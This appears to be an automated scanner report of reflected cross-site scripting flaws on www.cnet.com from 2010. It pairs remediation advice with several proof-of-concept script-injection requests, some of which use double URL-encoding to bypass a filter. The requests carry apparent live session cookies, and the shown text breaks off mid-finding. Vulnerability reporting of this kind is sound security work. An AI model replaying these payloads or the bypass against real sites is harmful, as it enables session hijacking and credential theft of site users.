Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d0aa"><script>alert(1)</script>215a7cfaa7b was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /8725-4_1-0.html?username=elinormills1d0aa"><script>alert(1)</script>215a7cfaa7b HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:17:39 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:17:38 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=987 Connection: Keep-Alive Content-Length: 52246
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <a href="/8725-4_1-0-1.html?username=elinormills1d0aa"><script>alert(1)</script>215a7cfaa7b&rpp=10" class="youAreHere"> ...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ef5"><script>alert(1)</script>bb07828150b was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /8726-4_1-0.html?username=elinormillse4ef5"><script>alert(1)</script>bb07828150b HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:17:28 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:17:28 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=962 Connection: Keep-Alive Content-Length: 47269
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <a href="/8726-4_1-0-2.html?username=elinormillse4ef5"><script>alert(1)</script>bb07828150b&rpp=10"> ...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6248c"><script>alert(1)</script>b9072f40778 was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /8728-4_1-0.html?username=elinormills6248c"><script>alert(1)</script>b9072f40778 HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:17:19 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:17:20 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=938 Connection: Keep-Alive Content-Length: 46995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <a href="/8728-4_1-0-2.html?username=elinormills6248c"><script>alert(1)</script>b9072f40778&rpp=10"> ...[SNIP]...
The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f2f"><script>alert(1)</script>631e7278df0 was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /8734-4_1-0.html?username=elinormills68f2f"><script>alert(1)</script>631e7278df0 HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:17:29 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:17:29 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=978 Connection: Keep-Alive Content-Length: 47101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <a href="/8734-4_1-0-2.html?username=elinormills68f2f"><script>alert(1)</script>631e7278df0&rpp=10"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c31f%253cscript%253ealert%25281%2529%253c%252fscript%253e12830b21553 was submitted in the REST URL parameter 2. This input was echoed as 5c31f<script>alert(1)</script>12830b21553 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/24KJeWLz5c31f%253cscript%253ealert%25281%2529%253c%252fscript%253e12830b21553/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:39 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:39 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=981 Connection: Keep-Alive Content-Length: 31136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>24KJeWLz5c31f<script>alert(1)</script>12830b21553's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce348%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c0e254f3f was submitted in the REST URL parameter 2. This input was echoed as ce348"><script>alert(1)</script>6c0e254f3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/24KJeWLzce348%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c0e254f3f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:37 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:38 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=991 Connection: Keep-Alive Content-Length: 31067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="24KJeWLzce348"><script>alert(1)</script>6c0e254f3f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4888%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecb1d2fbec0 was submitted in the REST URL parameter 2. This input was echoed as d4888"><script>alert(1)</script>cb1d2fbec0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Brian.Tongd4888%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecb1d2fbec0/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:53 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:53 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=993 Connection: Keep-Alive Content-Length: 31123
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Brian.Tongd4888"><script>alert(1)</script>cb1d2fbec0"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34b0c%253cscript%253ealert%25281%2529%253c%252fscript%253e730e2137083 was submitted in the REST URL parameter 2. This input was echoed as 34b0c<script>alert(1)</script>730e2137083 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Brian.Tong34b0c%253cscript%253ealert%25281%2529%253c%252fscript%253e730e2137083/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:55 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:55 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=970 Connection: Keep-Alive Content-Length: 31062
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Brian.Tong34b0c<script>alert(1)</script>730e2137083's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e3a1%253cscript%253ealert%25281%2529%253c%252fscript%253e987a29172f6 was submitted in the REST URL parameter 2. This input was echoed as 9e3a1<script>alert(1)</script>987a29172f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ChrisMatyszczyk9e3a1%253cscript%253ealert%25281%2529%253c%252fscript%253e987a29172f6/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:10 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:10 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=986 Connection: Keep-Alive Content-Length: 31112
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>ChrisMatyszczyk9e3a1<script>alert(1)</script>987a29172f6's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 364ca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e049d548ff13 was submitted in the REST URL parameter 2. This input was echoed as 364ca"><script>alert(1)</script>049d548ff13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ChrisMatyszczyk364ca%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e049d548ff13/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:09 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:09 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=938 Connection: Keep-Alive Content-Length: 31146
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="ChrisMatyszczyk364ca"><script>alert(1)</script>049d548ff13"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b8a4d%253cscript%253ealert%25281%2529%253c%252fscript%253e428bca84c78 was submitted in the REST URL parameter 2. This input was echoed as b8a4d<script>alert(1)</script>428bca84c78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
